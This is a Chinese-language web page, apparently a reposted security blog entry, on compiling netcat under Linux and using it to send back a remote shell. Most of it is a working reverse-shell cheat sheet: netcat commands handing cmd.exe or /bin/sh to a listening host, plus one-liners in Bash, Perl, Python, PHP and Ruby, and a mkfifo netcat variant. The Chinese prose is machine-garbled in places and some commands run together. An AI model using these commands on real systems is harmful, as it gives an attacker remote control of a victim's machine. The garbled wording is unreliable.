|
|
|
联系客服020-83701501

linux下编译netcat并且反弹cmdshell

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
linux下编译netcat并且反弹cmdshell 外埠Windows监听 nc -vv -l -p 1234???????? ? ?首先从sf上get一个tar的延长包 wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz 然后固然是解压了 tar zxvf netcat-0.7.1.tar.gz ?解压结束以后会天生目录,要cd出来 cd netcat-0.7.1 然落伍行编译前的配置。 ./configure ?配置完了以后便大概make编译了。 ?编译获胜就天生了netcat可执行的文件了,位于src目录,cd出来进交运行./netcat -h.如图 外埠Windows监听 nc -vv -l -p 1234???????????????????????????????????????? ? ? 长途Windows转发
nc -t -e C:WINDOWSsystem32cmd.exe 8.8.8.8 1234 ? 长途Linux转发 ./netcat?8.8.8.8?1234 -e /bin/sh ReverseShell.c ReverseShell.pl ReverseShell.py phpspy.php

?———————NetCat for linux 参数e————————- wget http://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz/download -O netcat-0.7.1.tar.gz tar zxvf netcat-0.7.1.tar.gz cd netcat-0.7.1 ./configure make cd src ./netcat -h ——————————————————————– 一句话反弹饬令 http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [Bash] Default
1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

 

[PERL] Default
1 perl -e ‘use Socket;$i=”10.0.0.1″;$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

 

[Python] Default
1 python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.0.0.1″,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

 

[PHP] Default
1 php -r ‘$sock=fsockopen(“10.0.0.1″,1234);exec(“/bin/sh -i <&3 >&3 2>&3″);’

 

[Ruby] Default
1 ruby -rsocket -e’f=TCPSocket.open(“10.0.0.1″,1234).to_i;exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

 

[Netcat]

Default
12 nc -e /bin/sh 10.0.0.1 1234rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f

 

原文:http://blog.xxgo.org/technology/linuxbackshellwithnc.html 本文由网络保险攻防研究室(www.91ri.org)消息保险小组搜集整理,转载请注明因由。

数安新闻+更多

证书相关+更多